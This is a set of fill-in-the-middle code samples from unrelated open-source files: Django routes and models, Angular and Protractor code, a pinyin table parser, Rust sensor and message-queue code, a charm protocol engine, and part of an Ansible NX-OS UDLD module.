<|file_name|>urls.py<|end_file_name|><|fim▁begin|><|fim▁hole|> from django.conf import settings from django.conf.urls import patterns, url from ..profile_images.views import ProfileImageView from .accounts.views import AccountDeactivationView, AccountViewSet from .preferences.views import PreferencesView, PreferencesDetailView from .verification_api.views import PhotoVerificationStatusView ME = AccountViewSet.as_view({ 'get': 'get', }) ACCOUNT_LIST = AccountViewSet.as_view({ 'get': 'list', }) ACCOUNT_DETAIL = AccountViewSet.as_view({ 'get': 'retrieve', 'patch': 'partial_update', }) urlpatterns = patterns( '', url(r'^v1/me$', ME, name='own_username_api'), url(r'^v1/accounts/{}$'.format(settings.USERNAME_PATTERN), ACCOUNT_DETAIL, name='accounts_api'), url(r'^v1/accounts$', ACCOUNT_LIST, name='accounts_detail_api'), url( r'^v1/accounts/{}/image$'.format(settings.USERNAME_PATTERN), ProfileImageView.as_view(), name='accounts_profile_image_api' ), url( r'^v1/accounts/{}/deactivate/$'.format(settings.USERNAME_PATTERN), AccountDeactivationView.as_view(), name='accounts_deactivation' ), url( r'^v1/accounts/{}/verification_status/$'.format(settings.USERNAME_PATTERN), PhotoVerificationStatusView.as_view(), name='verification_status' ), url( r'^v1/preferences/{}$'.format(settings.USERNAME_PATTERN), PreferencesView.as_view(), name='preferences_api' ), url( r'^v1/preferences/{}/(?P<preference_key>[a-zA-Z0-9_]+)$'.format(settings.USERNAME_PATTERN), PreferencesDetailView.as_view(), name='preferences_detail_api' ), )<|fim▁end|>
""" Defines the URL routes for this app. """
<|file_name|>checkout.js<|end_file_name|><|fim▁begin|>'use strict'; angular.module('shopnxApp') .config(function ($stateProvider) { $stateProvider .state('checkout', { title: 'Checkout with the items you selected', url: '/checkout',<|fim▁hole|> }); });<|fim▁end|>
templateUrl: 'app/checkout/checkout.html', controller: 'CheckoutCtrl', authenticate: true
<|file_name|>models.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- from django.db import models from datetime import datetime class Place(models.Model): """ Holder object for basic info about the rooms in the university. """ room_place = models.CharField(max_length=255) floor = models.IntegerField() def __unicode__(self): return self.room_place class HierarchyUnit(models.Model): PROGRAM = 'PR' YEAR = 'YR' GROUP = 'GR' TYPES = ( (PROGRAM, u"Специалност"), (YEAR, u"Курс"), (GROUP, u"Група"), ) type_value = models.CharField(max_length=255, choices=TYPES) value = models.CharField(max_length=255) parent = models.ForeignKey("schedule.HierarchyUnit", null=True, blank=True, default=None) def get_all_info_for_parents(self): if self.type_value == 'PR': return self.value if self.type_value == 'YR': return ', '.join([self.parent.value, self.value+u' курс']) else: return ', '.join([self.parent.parent.value, self.parent.value+u' курс', self.value+u' група']) def get_all_childs(self): return HierarchyUnit.objects.filter(parent=self) def __unicode__(self): return self.get_all_info_for_parents() class Block(models.Model): """ Group representing a set of optional subjects. Example: Core of Computer Science. """ name = models.CharField(max_length=255) def __unicode__(self): return self.name class Subject(models.Model): """ Representation of all subjects. Example: Calculus 1. """ MANDATORY = 'MN' OPTIONAL = 'OP' TYPES = ( (MANDATORY, u"Задължителен"), (OPTIONAL, u"Избираем"), ) type_value = models.CharField(max_length=255, choices=TYPES) name = models.CharField(max_length=255) block = models.ForeignKey(Block, null=True, blank=True, default=None)<|fim▁hole|> year = models.ForeignKey(HierarchyUnit, null=True, blank=True, default=None, limit_choices_to={'type_value': HierarchyUnit.YEAR}) def get_year_value(self): return ', '.join([self.year.parent.value, self.year.value+u' курс']) def __unicode__(self): return self.name class Department(models.Model): """ Group representing a set of lecturers grouped by field of teaching. """ name = models.CharField(max_length=255) def __unicode__(self): return self.name class Teacher(models.Model): name = models.CharField(max_length=255) title = models.CharField(max_length=255) email = models.CharField(max_length=255) full_name = models.CharField(max_length=255) position = models.CharField(max_length=255) subjects = models.ManyToManyField(Subject, null=True, blank=True, default=None) department = models.ForeignKey(Department, null=True, blank=True, default=None) def __unicode__(self): return self.name class Event(models.Model): WEEKLY = 'WKL' TYPES = ( (WEEKLY, u'Седмично'), ) type_value = models.CharField(max_length=255, null=True, blank=True, default=None) inserted = models.DateField(default=datetime.now()) name = models.CharField(max_length=255) place = models.ForeignKey(Place, blank=True, default=None, null=True) date_start = models.DateTimeField() date_end = models.DateTimeField(default=datetime.now()) repeatable = models.BooleanField() duratation = models.IntegerField() subject = models.ForeignKey(Subject, blank=True, default=None, null=True) teacher = models.ForeignKey(Teacher, blank=True, default=None, null=True) def __unicode__(self): return self.name class Student(models.Model): PROGRAM = (('BK', 'Бакалавър'),('MG', 'Магистър')) name = models.CharField(max_length=255) program = models.CharField(max_length=255,choices=PROGRAM, blank=True, default=PROGRAM[0][0]) fac_number = models.CharField(max_length=255) email = models.CharField(max_length=255) group = models.ForeignKey(HierarchyUnit, limit_choices_to={'type_value': HierarchyUnit.GROUP}, blank=True, default=None, null=True) events = models.ManyToManyField(Event, blank=True, default=None, null=True) def __unicode__(self): return self.name class Comment(models.Model): from_user = models.ForeignKey(Student, blank=True, default=None, null=True) event = models.ForeignKey(Event, blank=True, default=None, null=True) start_date = models.DateField() end_date = models.DateField() dtstamp = models.DateField(default=datetime.now()) desc = models.TextField()<|fim▁end|>
<|file_name|>app.po.ts<|end_file_name|><|fim▁begin|>import { browser, by, element, promise, Key } from 'protractor'; export class AppPage { navigateTo(): Promise<unknown> { return browser.get(browser.baseUrl) as Promise<unknown>; } getTextareaCount(): promise.Promise<number> { return element.all(by.css('app-root textarea')).count(); } getTextareaHeight(index: number): promise.Promise<number> {<|fim▁hole|> const area = element.all(by.css(`app-root textarea`)).get(index); area.clear(); value.split('\n').forEach(line => { area.sendKeys(line); area.sendKeys(Key.ENTER); }); } reset(): void { element(by.tagName('button')).click(); } }<|fim▁end|>
return element.all(by.css(`app-root textarea`)).get(index).getSize().then(size => size.height); } setTextareaValue(index: number, value: string): void {
<|file_name|>zhuyin_table.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # # zhuyin_table.py # cjktools # """ An interface to the zhuyin <-> pinyin table. """ from functools import partial from . import cjkdata from cjktools.common import get_stream_context, stream_codec def _default_stream(): return open(cjkdata.get_resource('tables/zhuyin_pinyin_conv_table')) _get_stream_context = partial(get_stream_context, _default_stream) def parse_lines(istream): istream = stream_codec(istream) for line in istream: if not line.startswith('#'): yield line.rstrip().split() def zhuyin_to_pinyin_table(istream=None): """ Returns a dictionary mapping zhuyin to pinyin. """ with _get_stream_context(istream) as stream: table = {} for zhuyin, pinyin in parse_lines(stream): table[zhuyin] = pinyin return table def pinyin_to_zhuyin_table(istream=None): """ Returns a dictionary mapping zhuyin to pinyin. """ with _get_stream_context(istream) as istream: table = {} for zhuyin, pinyin in parse_lines(istream): table[pinyin] = zhuyin return table def get_all_pinyin(istream=None): """ Returns a list of all pinyin """ with _get_stream_context(istream) as istream: all_pinyin = ['r'] for zhuyin, pinyin in parse_lines(istream): all_pinyin.append(pinyin) return all_pinyin def pinyin_regex_pattern(istream=None): """ Returns a pinyin regex pattern, with optional tone number. """ all_pinyin = get_all_pinyin(istream) <|fim▁hole|> # Build a generic pattern for a single pinyin with an optional tone. pattern = '(%s)([0-5]?)' % '|'.join(all_pinyin) return pattern def zhuyin_regex_pattern(istream=None): """ Returns a zhuyin regex pattern. """ with _get_stream_context(istream) as istream: all_pinyin = [] for zhuyin, pinyin in parse_lines(istream): all_pinyin.append(pinyin) pattern = '(%s)[0-4]?' % '|'.join(all_pinyin) return pattern<|fim▁end|>
# Sort from longest to shortest, so as to make maximum matches whenever # possible. all_pinyin = sorted(all_pinyin, key=len, reverse=True)
<|file_name|>sensor_data.rs<|end_file_name|><|fim▁begin|>use std::{ fmt::{self, Display}, io, time::{Duration, SystemTime, UNIX_EPOCH}, }; use crate::{average::Average, json_display::JsonDisplay, sensors::Sensor}; macro_rules! convTimeEpochDuration { ($systemtime:expr) => { $systemtime .duration_since(UNIX_EPOCH) .expect("Time went backwards") }; } macro_rules! convDurationMs { ($duration:expr) => { $duration.as_secs() * 1000 + $duration.subsec_nanos() as u64 / 1_000_000 }; } #[derive(Copy, Clone)] pub struct SensorData { timestamp: Duration, bmp280_pressure: f32, bmp280_temperature: i32, htu21_temperature: i32, htu21_humidity: i32, } pub struct SensorCumulatedData { timestamp: Duration, bmp280_pressure: f64, bmp280_temperature: i64, htu21_temperature: i64, htu21_humidity: i64, } impl SensorData { pub fn new( timestamp: SystemTime, bmp280_pressure: f32, bmp280_temperature: i32, htu21_temperature: i32, htu21_humidity: i32, ) -> SensorData { SensorData { timestamp: convTimeEpochDuration!(timestamp), bmp280_pressure, bmp280_temperature, htu21_temperature, htu21_humidity, } } pub fn create( sensor_bmp280_pressure: &Sensor, sensor_bmp280_temperature: &Sensor, sensor_htu21_temperature: &Sensor, sensor_htu21_humidity: &Sensor, ) -> SensorData { SensorData::new( SystemTime::now(), sensor_bmp280_pressure.get::<f32>(), sensor_bmp280_temperature.get::<i32>(), sensor_htu21_temperature.get::<i32>(), sensor_htu21_humidity.get::<i32>(), ) } pub fn get_bmp280_pressure(&self) -> f32 { self.bmp280_pressure } pub fn get_bmp280_temperature(&self) -> i32 { self.bmp280_temperature } pub fn get_htu21_temperature(&self) -> i32 { self.htu21_temperature } pub fn get_htu21_humidity(&self) -> i32 { self.htu21_humidity } } impl Display for SensorData { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!( f, "\ttime = {}\n\tpressure = {}\n\tbmp280Temp= {}\n\thtu21Temp = {}\n\thumidity = {}\n", convDurationMs!(self.timestamp), self.bmp280_pressure, self.bmp280_temperature, self.htu21_temperature, self.htu21_humidity ) } } impl JsonDisplay for SensorData { fn json_item(&self, w: &mut io::Write) -> io::Result<()> { w.write_fmt(format_args!( "{{\"timestamp\": {},\n\"pressure\" : {:.2},\n\"bmp280Temp\": {:.3},\n\"htu21Temp\" : {:.3},\n\"humidity\" : {:.2}}}\n", convDurationMs!(self.timestamp), self.bmp280_pressure * 10.0, self.bmp280_temperature as f32 / 1000.0, self.htu21_temperature as f32 / 1000.0, self.htu21_humidity as f32 / 1000.0 )) } } impl Average<SensorData> for SensorData { type Acc = SensorCumulatedData; fn empty_cumulator() -> Self::Acc { SensorCumulatedData { timestamp: Duration::new(0, 0), bmp280_pressure: 0.0, bmp280_temperature: 0, htu21_temperature: 0, htu21_humidity: 0, } } fn cumulate<'a, 'b>(&'a self, cumulated_data: &'b mut Self::Acc) -> &'b Self::Acc { cumulated_data.timestamp += self.timestamp; cumulated_data.bmp280_pressure += self.bmp280_pressure as f64; cumulated_data.bmp280_temperature += self.bmp280_temperature as i64; cumulated_data.htu21_temperature += self.htu21_temperature as i64; cumulated_data.htu21_humidity += self.htu21_humidity as i64; cumulated_data } fn divide(cumulated_data: &Self::Acc, nb_elements: usize) -> SensorData { SensorData { timestamp: (cumulated_data.timestamp / nb_elements as u32),<|fim▁hole|> htu21_temperature: (cumulated_data.htu21_temperature / nb_elements as i64) as i32, htu21_humidity: (cumulated_data.htu21_humidity / nb_elements as i64) as i32, } } }<|fim▁end|>
bmp280_pressure: (cumulated_data.bmp280_pressure / nb_elements as f64) as f32, bmp280_temperature: (cumulated_data.bmp280_temperature / nb_elements as i64) as i32,
<|file_name|>3b0d1321079e_.py<|end_file_name|><|fim▁begin|>"""Add replies column Revision ID: 3b0d1321079e Revises: 1e2d77a2f0c4 Create Date: 2021-11-03 23:32:15.720557 """ from alembic import op import sqlalchemy as sa import sqlalchemy_utils from sqlalchemy.dialects import postgresql # revision identifiers, used by Alembic. revision = "3b0d1321079e" down_revision = "1e2d77a2f0c4" branch_labels = None<|fim▁hole|> def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.add_column( "comment", sa.Column( "replies", postgresql.JSONB(astext_type=sa.Text()), nullable=True ), ) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_column("comment", "replies") # ### end Alembic commands ###<|fim▁end|>
depends_on = None
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># Copyright 2012 Leonidas Poulopoulos #<|fim▁hole|># You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License.<|fim▁end|>
# Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License.
<|file_name|>test_mq.rs<|end_file_name|><|fim▁begin|>use libc::c_long; use std::ffi::CString; use std::str; use nix::errno::Errno::*; use nix::Error::Sys; use nix::mqueue::{mq_open, mq_close, mq_send, mq_receive, mq_getattr, mq_setattr, mq_unlink, mq_set_nonblock, mq_remove_nonblock}; use nix::mqueue::{MqAttr, MQ_OFlag}; use nix::sys::stat::Mode; #[test] fn test_mq_send_and_receive() { const MSG_SIZE: c_long = 32; let attr = MqAttr::new(0, 10, MSG_SIZE, 0); let mq_name= &CString::new(b"/a_nix_test_queue".as_ref()).unwrap(); let oflag0 = MQ_OFlag::O_CREAT | MQ_OFlag::O_WRONLY; let mode = Mode::S_IWUSR | Mode::S_IRUSR | Mode::S_IRGRP | Mode::S_IROTH; let r0 = mq_open(mq_name, oflag0, mode, Some(&attr)); if let Err(Sys(ENOSYS)) = r0 { println!("message queues not supported or module not loaded?"); return; }; let mqd0 = r0.unwrap(); let msg_to_send = "msg_1"; mq_send(mqd0, msg_to_send.as_bytes(), 1).unwrap(); let oflag1 = MQ_OFlag::O_CREAT | MQ_OFlag::O_RDONLY; let mqd1 = mq_open(mq_name, oflag1, mode, Some(&attr)).unwrap(); let mut buf = [0u8; 32]; let mut prio = 0u32; let len = mq_receive(mqd1, &mut buf, &mut prio).unwrap(); assert!(prio == 1); mq_close(mqd1).unwrap(); mq_close(mqd0).unwrap(); assert_eq!(msg_to_send, str::from_utf8(&buf[0..len]).unwrap()); } #[test] fn test_mq_getattr() { const MSG_SIZE: c_long = 32; let initial_attr = MqAttr::new(0, 10, MSG_SIZE, 0); let mq_name = &CString::new(b"/attr_test_get_attr".as_ref()).unwrap(); let oflag = MQ_OFlag::O_CREAT | MQ_OFlag::O_WRONLY; let mode = Mode::S_IWUSR | Mode::S_IRUSR | Mode::S_IRGRP | Mode::S_IROTH; let r = mq_open(mq_name, oflag, mode, Some(&initial_attr)); if let Err(Sys(ENOSYS)) = r { println!("message queues not supported or module not loaded?"); return; }; let mqd = r.unwrap(); let read_attr = mq_getattr(mqd); assert!(read_attr.unwrap() == initial_attr); mq_close(mqd).unwrap(); } // FIXME: Fix failures for mips in QEMU #[test] #[cfg_attr(any(target_arch = "mips", target_arch = "mips64"), ignore)] fn test_mq_setattr() { const MSG_SIZE: c_long = 32; let initial_attr = MqAttr::new(0, 10, MSG_SIZE, 0); let mq_name = &CString::new(b"/attr_test_get_attr".as_ref()).unwrap(); let oflag = MQ_OFlag::O_CREAT | MQ_OFlag::O_WRONLY; let mode = Mode::S_IWUSR | Mode::S_IRUSR | Mode::S_IRGRP | Mode::S_IROTH; let r = mq_open(mq_name, oflag, mode, Some(&initial_attr)); if let Err(Sys(ENOSYS)) = r { println!("message queues not supported or module not loaded?"); return; }; let mqd = r.unwrap(); let new_attr = MqAttr::new(0, 20, MSG_SIZE * 2, 100); let old_attr = mq_setattr(mqd, &new_attr); assert!(old_attr.unwrap() == initial_attr); let new_attr_get = mq_getattr(mqd); // The following tests make sense. No changes here because according to the Linux man page only // O_NONBLOCK can be set (see tests below) assert!(new_attr_get.unwrap() != new_attr); let new_attr_non_blocking = MqAttr::new(MQ_OFlag::O_NONBLOCK.bits() as c_long, 10, MSG_SIZE, 0); mq_setattr(mqd, &new_attr_non_blocking).unwrap(); let new_attr_get = mq_getattr(mqd); // now the O_NONBLOCK flag has been set assert!(new_attr_get.unwrap() != initial_attr); assert!(new_attr_get.unwrap() == new_attr_non_blocking); mq_close(mqd).unwrap(); } // FIXME: Fix failures for mips in QEMU #[test] #[cfg_attr(any(target_arch = "mips", target_arch = "mips64"), ignore)] fn test_mq_set_nonblocking() { const MSG_SIZE: c_long = 32; let initial_attr = MqAttr::new(0, 10, MSG_SIZE, 0); let mq_name = &CString::new(b"/attr_test_get_attr".as_ref()).unwrap(); let oflag = MQ_OFlag::O_CREAT | MQ_OFlag::O_WRONLY; let mode = Mode::S_IWUSR | Mode::S_IRUSR | Mode::S_IRGRP | Mode::S_IROTH; let r = mq_open(mq_name, oflag, mode, Some(&initial_attr)); if let Err(Sys(ENOSYS)) = r { println!("message queues not supported or module not loaded?"); return; }; let mqd = r.unwrap(); mq_set_nonblock(mqd).unwrap(); let new_attr = mq_getattr(mqd); assert!(new_attr.unwrap().flags() == MQ_OFlag::O_NONBLOCK.bits() as c_long); mq_remove_nonblock(mqd).unwrap(); let new_attr = mq_getattr(mqd); assert!(new_attr.unwrap().flags() == 0); mq_close(mqd).unwrap(); } #[test] fn test_mq_unlink() { const MSG_SIZE: c_long = 32; let initial_attr = MqAttr::new(0, 10, MSG_SIZE, 0); let mq_name_opened = &CString::new(b"/mq_unlink_test".as_ref()).unwrap(); let mq_name_not_opened = &CString::new(b"/mq_unlink_test".as_ref()).unwrap(); let oflag = MQ_OFlag::O_CREAT | MQ_OFlag::O_WRONLY; let mode = Mode::S_IWUSR | Mode::S_IRUSR | Mode::S_IRGRP | Mode::S_IROTH; let r = mq_open(mq_name_opened, oflag, mode, Some(&initial_attr)); if let Err(Sys(ENOSYS)) = r { println!("message queues not supported or module not loaded?"); return; }; let mqd = r.unwrap();<|fim▁hole|> let res_unlink_not_opened = mq_unlink(mq_name_not_opened); assert!(res_unlink_not_opened == Err(Sys(ENOENT)) ); mq_close(mqd).unwrap(); let res_unlink_after_close = mq_unlink(mq_name_opened); assert!(res_unlink_after_close == Err(Sys(ENOENT)) ); }<|fim▁end|>
let res_unlink = mq_unlink(mq_name_opened); assert!(res_unlink == Ok(()) );
<|file_name|>protocol.py<|end_file_name|><|fim▁begin|># TODO: provide a transition checker that prevents a feedback loop, inconsistent state. # in user db that way user can eliminate store step on the receive side. from charm.core.engine.util import * from charm.toolbox.enum import Enum from math import log, ceil debug = False # standardize responses between client and server # code = Enum('Success', 'Fail', 'Repeat', 'StartSubprotocol', 'EndSubprotocol') class Protocol: def __init__(self, error_states, max_size=2048): # any init information? global error self.p_ID = 0 self.p_ctr = 0 error = error_states # dictionary of party types (each type gets an identifier) self.partyTypes = {} self.party = {} self._serialize = False self.db = {} # initialize the database self.max_size = max_size self.prefix_size = ceil(log(max_size, 256)) def setup(self, *args): # handles the hookup between parties involved Error = True for arg in args: if isinstance(arg, dict): print("Setup of: ", arg['name']) if not self.addInstance(arg): Error = False else: print(type(arg)) return Error def addInstance(self, obj): p_ctr = self.p_ctr for i in self.partyTypes.keys(): if i == obj['type']: # we find the party type self.party[p_ctr] = {} self.party[p_ctr]['name'], self.party[p_ctr]['socket'] = obj['name'], obj['socket'] self.party[p_ctr]['type'], self.party[p_ctr]['states'] = obj['type'], self.partyTypes[i]['states'] self.party[p_ctr]['init'] = self.partyTypes[i]['init'] self.p_ctr += 1 print("Adding party instance w/ id: ", p_ctr) return True return None def addPartyType(self, type, state_map, trans_map, init_state=False): ExistingTypeFound = False # see if type already exists. break and return if so for i in self.partyTypes.keys(): if self.partyTypes[i]['type'] == type: ExistingTypeFound = True break # means we are adding a new type if not ExistingTypeFound: p_ID = self.p_ID party = {'type':type, 'id':p_ID } if(isinstance(state_map, dict)): party['states'] = state_map # function pointers for state functions... if(isinstance(trans_map, dict)): party['transitions'] = trans_map party['init'] = init_state # which state initializes the protocol self.partyTypes[type] = party # makes sure self.p_ID += 1 return True return False # # def addValidTransitions(self, trans_map): # if isinstance(trans_map, dict): # self.trans_map = trans_map def listStates(self, partyID): # check if a member parameter is defined if partyID < self.p_ctr: return self.party[partyID]['states'] return None def listParties(self): return list(self.party.keys()) def listParyTypes(self): return list(self.partyTypes.keys()) def getInitState(self, _type): for i in self.listParties(): if self.party[i]['type'] == _type: self._socket = self.party[i]['socket'] if self.party[i]['init']: # set current trans starting point self.cur_state = 1 return (True, self.listStates(i)[1]) else: self.cur_state = 2 return (False, self.listStates(i)[2]) print("Returning junk!") return (False, None) def setState(self, state_num): # find the corresponding call back based on current party id self.nextCall = None if state_num == None: return None nextPossibleState = self._cur_trans.get(self.cur_state) if type(nextPossibleState) == list and not state_num in nextPossibleState: print("Invalid State Transition! Error!") print("\tCurrent state: ", self.cur_state) print("\tNext state: ", state_num) print("Allowed states: ", nextPossibleState) elif type(nextPossibleState) != list and nextPossibleState != state_num: print("Invalid State Transition! Error!") print("\tCurrent state: ", self.cur_state) print("\tNext state not allowed: ", state_num) # do not make the transition return None for i in self.listParties(): states = self.listStates(i) if states.get(state_num) != None: self.nextCall = states.get(state_num) # preparing for state transition here. self.cur_state = state_num break return None def send_msg(self, object): # use socket to send message (check if serializaton is required) if self._socket != None: if self._serialize: result = self._user_serialize(object) else: result = self.serialize(object) #print("DEBUG: send_msg : result =>", result) if len(result) > self.max_size: print("Message too long! max_size="+str(self.max_size)) return None result = len(result).to_bytes(length=self.prefix_size, byteorder='big') + result self._socket.send(result) return None # receives exactly n bytes def recv_all(self, n): recvd = 0 res = b'' while recvd < n: res = res + self._socket.recv(n-recvd) recvd = len(res) return res def recv_msg(self): # read the socket and return the received message (check if deserialization) # is necessary if self._socket != None: # block until data is available or remote host closes connection msglen = int.from_bytes(self.recv_all(self.prefix_size), byteorder='big') result = self.recv_all(msglen) if result == '': return None else: if self._serialize: return self._user_deserialize(result) else: # default serialize call return self.deserialize(result) return None # # serialize an object # def serialize(self, object): # if type(object) == str: # return bytes(object, 'utf8') # return object # # def deserialize(self, object): # if type(object) == bytes: # return object.decode('utf8') # return object def setSubclassVars(self, group, state=None): if hasattr(group, 'serialize') and hasattr(group, 'deserialize'): self.group = group if state != None: if type(state) == dict: self.db = state def get(self, keys, _type=tuple): if not type(keys) == list: return if _type == tuple: ret = [] else: ret = {} # get the data for i in keys: if _type == tuple: ret.append(self.db[i]) else: # dict ret[ i ] = self.db[i] # return data if _type == tuple: return tuple(ret) return ret def store(self, *args): for i in args: if isinstance(i, tuple): self.db[ i[0] ] = i[1] return None def serialize(self, object): # print("input object... => ", object) if type(object) == dict: bytes_object = serializeDict(object, self.group) return pickleObject(bytes_object) elif type(object) == str: return pickleObject(object) else: # print("serialize: just =>", object) return object def deserialize(self, bytes_object): # print("deserialize input =>", bytes_object) if type(bytes_object) == bytes: object = unpickleObject(bytes_object) if isinstance(object, dict): return deserializeDict(object, self.group) return object # OPTIONAL # derived class must call this function in order to def setSerializers(self, serial, deserial): self._serialize = True self._user_serialize = serial self._user_deserialize = deserial return None # records the final state of a protocol execution def setErrorCode(self, value): self.result = value # executes state machine from the 'party_type' perspective def execute(self, party_type, close_sock=True): print("Party Descriptions:") print(self.listParyTypes(), "\n") # print("Executing protocol engine...") # assume there are two parties: support more in the future. # if len(self.listParties()) == 2: # p1, p2 = self.listParties() # print(self.listParties()) # main loop # Timeout = False (start, func) = self.getInitState(party_type) self._cur_trans = self.partyTypes[party_type]['transitions'] #print("Possible transitions: ", self._cur_trans) print("Starting Point => ", func.__name__) if start == True: # call the first state for party1, then send msg output = func.__call__() if type(output) == dict: self.db.update(output) self.send_msg(output) else: # first receive message, call state function # then send call response input = self.recv_msg() if type(input) == dict: # print("input db :=>", input) self.db.update(input) output = func.__call__(input) if isinstance(output, dict): # print("output db :=>", output) self.db.update(output) self.send_msg(output) # take output and send back to other party via socket while self.nextCall != None: input = self.recv_msg() if isinstance(input, dict): self.db.update(input) output = self.nextCall.__call__(input) if output != None: if isinstance(output, dict): self.db.update(output) self.send_msg(output) if close_sock: self.clean() return output def check(self): # cycle through parties, make sure they are differntly typed? # p_ID must be at least 2 # ... pass def clean(self):<|fim▁hole|> if debug: print("Cleaning database...") self._socket.close() self.db.clear() print("PROTOCOL COMPLETE!") return None<|fim▁end|>
<|file_name|>nxos_udld_interface.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # ANSIBLE_METADATA = {'status': ['preview'], 'supported_by': 'community', 'version': '1.0'} DOCUMENTATION = ''' --- module: nxos_udld_interface version_added: "2.2" short_description: Manages UDLD interface configuration params. description: - Manages UDLD interface configuration params. extends_documentation_fragment: nxos author: - Jason Edelman (@jedelman8) notes: - Feature UDLD must be enabled on the device to use this module. options: mode: description: - Manages UDLD mode for an interface. required: true choices: ['enabled','disabled','aggressive'] interface: description: - FULL name of the interface, i.e. Ethernet1/1- required: true state: description: - Manage the state of the resource. required: false default: present choices: ['present','absent'] ''' EXAMPLES = ''' # ensure Ethernet1/1 is configured to be in aggressive mode - nxos_udld_interface: interface: Ethernet1/1 mode: aggressive state: present host: "{{ inventory_hostname }}" username: "{{ un }}" password: "{{ pwd }}" # Remove the aggressive config only if it's currently in aggressive mode and then disable udld (switch default) - nxos_udld_interface: interface: Ethernet1/1 mode: aggressive state: absent host: "{{ inventory_hostname }}" username: "{{ un }}" password: "{{ pwd }}" # ensure Ethernet1/1 has aggressive mode enabled - nxos_udld_interface:<|fim▁hole|> host: "{{ inventory_hostname }}" username: "{{ un }}" password: "{{ pwd }}" ''' RETURN = ''' proposed: description: k/v pairs of parameters passed into module returned: always type: dict sample: {"mode": "enabled"} existing: description: - k/v pairs of existing configuration type: dict sample: {"mode": "aggressive"} end_state: description: k/v pairs of configuration after module execution returned: always type: dict sample: {"mode": "enabled"} updates: description: command sent to the device returned: always type: list sample: ["interface ethernet1/33", "no udld aggressive ; no udld disable"] changed: description: check to see if a change was made on the device returned: always type: boolean sample: true ''' import json # COMMON CODE FOR MIGRATION import re from ansible.module_utils.basic import get_exception from ansible.module_utils.netcfg import NetworkConfig, ConfigLine from ansible.module_utils.shell import ShellError try: from ansible.module_utils.nxos import get_module except ImportError: from ansible.module_utils.nxos import NetworkModule def to_list(val): if isinstance(val, (list, tuple)): return list(val) elif val is not None: return [val] else: return list() class CustomNetworkConfig(NetworkConfig): def expand_section(self, configobj, S=None): if S is None: S = list() S.append(configobj) for child in configobj.children: if child in S: continue self.expand_section(child, S) return S def get_object(self, path): for item in self.items: if item.text == path[-1]: parents = [p.text for p in item.parents] if parents == path[:-1]: return item def to_block(self, section): return '\n'.join([item.raw for item in section]) def get_section(self, path): try: section = self.get_section_objects(path) return self.to_block(section) except ValueError: return list() def get_section_objects(self, path): if not isinstance(path, list): path = [path] obj = self.get_object(path) if not obj: raise ValueError('path does not exist in config') return self.expand_section(obj) def add(self, lines, parents=None): """Adds one or lines of configuration """ ancestors = list() offset = 0 obj = None ## global config command if not parents: for line in to_list(lines): item = ConfigLine(line) item.raw = line if item not in self.items: self.items.append(item) else: for index, p in enumerate(parents): try: i = index + 1 obj = self.get_section_objects(parents[:i])[0] ancestors.append(obj) except ValueError: # add parent to config offset = index * self.indent obj = ConfigLine(p) obj.raw = p.rjust(len(p) + offset) if ancestors: obj.parents = list(ancestors) ancestors[-1].children.append(obj) self.items.append(obj) ancestors.append(obj) # add child objects for line in to_list(lines): # check if child already exists for child in ancestors[-1].children: if child.text == line: break else: offset = len(parents) * self.indent item = ConfigLine(line) item.raw = line.rjust(len(line) + offset) item.parents = ancestors ancestors[-1].children.append(item) self.items.append(item) def get_network_module(**kwargs): try: return get_module(**kwargs) except NameError: return NetworkModule(**kwargs) def get_config(module, include_defaults=False): config = module.params['config'] if not config: try: config = module.get_config() except AttributeError: defaults = module.params['include_defaults'] config = module.config.get_config(include_defaults=defaults) return CustomNetworkConfig(indent=2, contents=config) def load_config(module, candidate): config = get_config(module) commands = candidate.difference(config) commands = [str(c).strip() for c in commands] save_config = module.params['save'] result = dict(changed=False) if commands: if not module.check_mode: try: module.configure(commands) except AttributeError: module.config(commands) if save_config: try: module.config.save_config() except AttributeError: module.execute(['copy running-config startup-config']) result['changed'] = True result['updates'] = commands return result # END OF COMMON CODE def execute_config_command(commands, module): try: module.configure(commands) except ShellError: clie = get_exception() module.fail_json(msg='Error sending CLI commands', error=str(clie), commands=commands) except AttributeError: try: commands.insert(0, 'configure') module.cli.add_commands(commands, output='config') module.cli.run_commands() except ShellError: clie = get_exception() module.fail_json(msg='Error sending CLI commands', error=str(clie), commands=commands) def get_cli_body_ssh(command, response, module): """Get response for when transport=cli. This is kind of a hack and mainly needed because these modules were originally written for NX-API. And not every command supports "| json" when using cli/ssh. As such, we assume if | json returns an XML string, it is a valid command, but that the resource doesn't exist yet. Instead, the output will be a raw string when issuing commands containing 'show run'. """ if 'xml' in response[0] or response[0] == '\n': body = [] elif 'show run' in command: body = response else: try: body = [json.loads(response[0])] except ValueError: module.fail_json(msg='Command does not support JSON output', command=command) return body def execute_show(cmds, module, command_type=None): command_type_map = { 'cli_show': 'json', 'cli_show_ascii': 'text' } try: if command_type: response = module.execute(cmds, command_type=command_type) else: response = module.execute(cmds) except ShellError: clie = get_exception() module.fail_json(msg='Error sending {0}'.format(cmds), error=str(clie)) except AttributeError: try: if command_type: command_type = command_type_map.get(command_type) module.cli.add_commands(cmds, output=command_type) response = module.cli.run_commands() else: module.cli.add_commands(cmds, raw=True) response = module.cli.run_commands() except ShellError: clie = get_exception() module.fail_json(msg='Error sending {0}'.format(cmds), error=str(clie)) return response def execute_show_command(command, module, command_type='cli_show'): if module.params['transport'] == 'cli': if 'show run' not in command: command += ' | json' cmds = [command] response = 